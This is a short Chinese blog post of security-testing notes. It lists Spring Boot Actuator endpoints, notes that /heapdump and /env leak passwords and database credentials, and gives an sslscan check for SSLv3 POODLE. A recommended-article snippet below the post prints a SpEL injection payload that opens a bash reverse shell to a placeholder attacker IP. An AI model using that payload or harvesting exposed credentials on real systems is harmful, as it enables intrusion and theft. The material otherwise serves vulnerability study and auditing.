springboot未授权访问&CVE-2014-3566

最新推荐文章于 2024-05-28 09:55:01 发布
最新推荐文章于 2024-05-28 09:55:01 发布
阅读量565 收藏 1
点赞数
文章标签: 数据库 java spring python linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42430287/article/details/124441601
版权

springboot actuator未授权访问

Spring Boot 1.x版本端点在根URL下注册

/autoconfig					提供了一份自动配置报告,记录哪些自动配置条件通过了,哪些没通过
/beans					    描述应用程序上下文里全部的Bean,以及它们的关系
/env					    获取全部环境属性
/configprops				描述配置属性(包含默认值)如何注入Bean
/dump						获取线程活动的快照
/health						报告应用程序的健康指标,这些值由HealthIndicator的实现类提供
/info						获取应用程序的定制信息,这些信息由info打头的属性提供
/mappings					描述全部的URI路径,以及它们和控制器(包含Actuator端点)的映射关系
/metrics					报告各种应用程序度量信息,比如内存用量和HTTP请求计数
/shutdown					关闭应用程序,要求endpoints.shutdown.enabled设置为true
/trace						提供基本的HTTP请求跟踪信息(时间戳、HTTP头等)

Spring Boot 2.x版本端点移动到/actuator/路径

在/heapdump路径下存在内存泄漏,其中拥有大量后台密码
在/health目录下并未发现git项目地址
在/env配置下存在数据库类型账号密码

21.SSLv3 存在严重设计缺陷漏洞 (CVE-2014-3566)

sslscan -tlsall 127.0.0.1

Bolgzhang
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网安漏洞知识系列:spring boot授权访问及Swagger漏洞处理
weixin_54626591的博客
07-19 778
spring boot授权访问及Swagger漏洞处理
漏洞复现 - - - Springboot授权访问
热门推荐
weixin_67503304的博客
09-05 2万+
讲解了 Springboot授权访问漏洞的原理,并且利用反弹shell的方式进行了漏洞复现,包括使用了powershell脚本文件
SpringBoot Actuator授权访问漏洞修复
JHIII的博客
08-25 2万+
目前SpringBoot得框架,越来越广泛,大多数中小型企业,在开发新项目得时候。后端语言使用java得情况下,首选都会使用到SpringBoot。在很多得一些开源得框架中,例如: ruoyi若以,这些。不知道是出于什么原因?我们都会在这些框架中得pom文件中找到的依赖。嘿,这Actuator估计很多人都没有真真实实使用过,但是就会出现在pom文件中;这样导致,在做一些安全漏洞测试的时候,会出现漏洞问题。例如下面:对于这些漏洞,我们开始修复喽!!!
Springboot授权访问
lonmar的博客
07-19 1万+
Actuator简介 Actuator 是 springboot 提供的用来对应用系统进行自省和监控的功能模块,借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。在 Actuator 启用的情况下,如果没有做好相关权限控制,非法用户可通过访问默认的执行器端点(endpoints)来获取应用系统中的监控信息。 如上所言,actuator 是 springboot 提供的用来对应用系统进行自省和监控的功能模块。其提供的执行器端点分为两类:原生端点和用户自定义扩展端点,原生端点主
spring boot授权访问及Swagger漏洞处理
yudaxiaye的博客
06-20 1万+
无需修改源码,处理spring boot授权访问及Swagger漏洞处理
SpringBoot漏洞复现
懂进攻知防守
08-01 5765
SpringBoot基本上是Spring框架的扩展。Actuator是Springboot提供的用来对应用系统进行自省和监控的功能模块,借助于Actuator,开发者可以很方便地对应用系统的某些监控指标进行查看、统计等。在Actuator启用的情况下,如果没有做好相关权限控制,非法用户可通过访问默认的执行器端点(endpoints)来获取应用系统中的监控信息。......
用Docker复现SpringBoot CVE-2016-4977
m0_69555575的博客
08-22 563
Docker复现SpringBoot CVE-2016-4977
漏洞复现—Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273
weixin_45556536的博客
12-24 1278
CVE-2017-4971 // 注意反弹的端口和IP修改,反弹语句需要url编码 &_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vulhub
Spring Cloud Gateway远程代码执行CVE-2022-22947漏洞分析及复现
include_voidmain的博客
03-29 1682
0x01 漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。 据公布的漏洞描述称,当Spring Cloud Gateway 执行器端点启用、公开且不安全时,使用Spring Cloud Gateway的应用程序容易受到代码注入攻击。远程攻击者可以发出含有恶意代码的请求,从而允许在远程主机上任意远程执行。 0x02 漏洞影响 漏洞编号:CVE-2
CVE-2022-22978 Spring-security 认证绕过漏洞分析和漏洞挖掘思考
Q54665642ljf的博客
09-08 6363
在此之前,已经对CVE-2022-32532 Apache Shiro RegExPatternMatcher 认证绕过漏洞进行了分析,它和CVE-2022-22978漏洞产生原理上,本质是一样的。在分析这两个漏洞后,结合今年kcon议题《自动化API漏洞Fuzz实战》,产生了对漏洞挖掘关注点的一些思考。
Apache Shiro权限绕过漏洞 (CVE-2020-11989) 挖掘分析和复现
smellycat000的专栏
11-12 1842
聚焦源代码安全,网罗国内外最新资讯!1.1 状态完成漏洞挖掘条件分析、漏洞复现。1.2 简介Apache Shiro作为Java框架,可被用于身份认证、授权等任务。整合Apache S...
SpringBoot历史漏洞复现
weixin_53747497的博客
04-01 7133
Spring框架为开发Java应用程序提供了全面的基础架构支持。它包含一些很好的功能,如依赖注入和开 箱即用的模块,如:Spring JDBC 、Spring MVC 、Spring Security、 Spring AOP 、Spring ORM 、 Spring Test,这些模块缩短应用程序的开发时间,提高了应用开发的效率例如,在Java Web开发的早 期阶段,我们需要编写大量的代码来将记录插入到数据库中。
SpringbootActuator授权访问漏洞
最新发布
潇逗
05-28 4468
Actuator 是 SpringBoot 提供的用来对应用系统进行自省和监控的功能模块,借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。然而,其默认配置会出现接口授权访问,导致部分接口会泄露网站数据库连接信息等配置信息,使用Jolokia库特性甚至可以远程执行任意代码,获取服务器权限。
SpringBoot历史漏洞复现_springboot漏洞,2024年最新真的醉了
m0_62289824的博客
04-15 2449
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~(img-yTSj4IpJ-1713175561720)]//转化的格式base。//反弹shell脚本。
Spring Boot Actuator 漏洞复现合集
drnrrwfs的博客
06-12 9615
Spring Boot Actuator 授权访问漏洞在日常的测试中还是能碰到一些的,这种授权在某些情况下是可以达到RCE的效果的,所以还有有一定价值的,下面就是对这一系列漏洞复现。基本上就是参考这篇文章的做的复现:LandGrey/SpringBootVulExploit: SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list (github.com)Spring Boot Actuator端点通过 JMX 和HTTP 公开暴露给外界访问,大多数时候我们使用基
spring boot actuator 授权访问(env泄露redis密码)
lyink001的博客
12-16 9065
actuator 授权访问获取redis密码
spring boot远程代码执行漏洞复现
qq_63980959的博客
09-20 4181
目前我们所使用的https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-mysql-jdbc-rce靶场环境存在问题,需要进行相关配置。https://github.com/LandGrey/SpringBootVulExploit#0x07h2-database-console-jndi-rce上的该漏洞复现方式已经不能用了。如果你遇到了程序异常退出问题,可以尝试修改我们的java注入代码。
SpringBoot历史漏洞复现_springboot漏洞,经典实战教程
m0_60707685的博客
04-08 3473
2.找到属性名,使用bp抓包,抓/jolokia的包,发送到重发模块,修改包为post请求,把传输的变量改json,然后加上下面的poc,重放这个包,明文值结果包含 在 response 数据包中的 value 键中。注意:每个1.x 版本和2.x 版本不同。
CVE-2014-3566
07-28
回答: CVE-2014-3566是指POODLE攻击,它利用了SSLv3协议中的一个漏洞。攻击者可以通过重新发送密文来获取明文信息。具体来说,攻击者需要重新发送密文,直到服务器接受请求。根据CBC解密过程,攻击者可以通过密文的XOR操作来获取明文的一部分信息。攻击者可以通过控制HTTP请求路径的长度来逐渐将需要解密的cookie位置推到解密窗口中。每次解密一个字节平均需要256次请求。这个漏洞的主要原因是SSLv3没有规定填充块字节的内容,只校验填充块的最后一个字节。因此,在TLS上使用相同的攻击方式成功率较低。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* *2* *3* [CVE-2014-3566 SSLv3 POODLE原理分析](https://blog.csdn.net/weixin_34004576/article/details/87981629)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值